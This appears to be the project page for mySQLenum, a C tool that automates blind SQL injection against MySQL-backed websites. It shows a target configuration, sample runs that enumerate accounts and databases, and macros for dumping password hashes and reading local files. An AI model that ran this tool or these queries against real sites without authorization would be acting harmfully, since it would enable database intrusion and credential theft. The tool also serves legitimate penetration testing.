mySQLenum

mySQLenum is a command line automatic blind sql injection tool for web applications that uses MySql server as its back-end.
It's written in pure C, don't depends from any external library, is fast and support all recent MySQL versions.
The algorithm used for the enumeration was designed to reduce the executed requests number and limit the bandwidth usage.

The configuration can be easily made editing the mysqlenum.conf file.

Example:

#Server host
host = www.example.com

#Server port
port = 80

#Vulnerable page
page = /index.php

#HTTP method
#GET or POST (Default is GET)
httpmethod = GET

#Vulnerable parameter included the default value
#Example: vulnparam = id=9
#         vulnparam = name=hello'
#         vulnparam = code=ABC"
vulnparam = page_id=2

#String to match in the page when the query is valid (TRUE)
matchstring = Hello

#SQL query to execute
sqlquery = select user from accounts

...more options available

mySQLenum works in two ways:
Standard Mode

In this mode mySQLenum enumerates a custom query, specified in the configuration file or using the command line option --sql-query.

Example:

$ ./mysqlenum --sql-query="select user from accounts"
mySQLenum 0.3
Copyright (C) 2009-2010 Andrea Fabrizi 

 Query: select user from accounts

 1)  admin 
 2)  local 
 3)  marco 
 4)  luca 
 5)  ---

 > Total requests: 192
 > Data sent: 63 Kb
 > Data received: 675 Kb

Macro Mode

Using the Macro mode is possible to automatically enumerate predefined queries.
The information_schema database must be accessible to execute the macros 1,2 and 3. 

$ ./mysqlenum -m
mySQLenum 0.3
Copyright (C) 2009-2010 Andrea Fabrizi 

  Available macros:
    0) Test enumeration
    1) Databases enumeration
    2) Tables enumeration
    3) Fields enumeration
    4) MySQL Version
    5) Current User
    6) Current Database
    7) MySQL Users and password hashes
    8) View local file
    9) Data directory

  Your choice: 1

Databases:
 1)  information_schema 
 2)  security 
 3)  mysql 
 4)  phpmyadmin 
 5)  ---

 > Total requests: 361
 > Data sent: 136 Kb
 > Data received: 1275 Kb


Help

$ ./mysqlenum -h
mySQLenum 0.3
 usage: ./mysqlenum [OPTION...]

 OPTIONS:
   -c,   --config		 config file (default is mysqlenum.conf).
   -q,   --sql-query		 SQL Query to execute.
   -r,   --start-row		 starts the enumeration from this row (default is the  first row).
   -m,   --macro		 start macro mode.

         --no-spinner		 disable the spinner.
         --quiet		 quiet (no output).
   -h,   --help			 this help.
   -V,   --version		 display the version and exit.
   -v,   --verbose		 be verbose (-vvv for very verbose).


Changelog version 0.3:
Download:

Source tarball mysqlenum-0.3.tar.gz

Name:
Email: (Will not appear online)
Comment:
Security Code: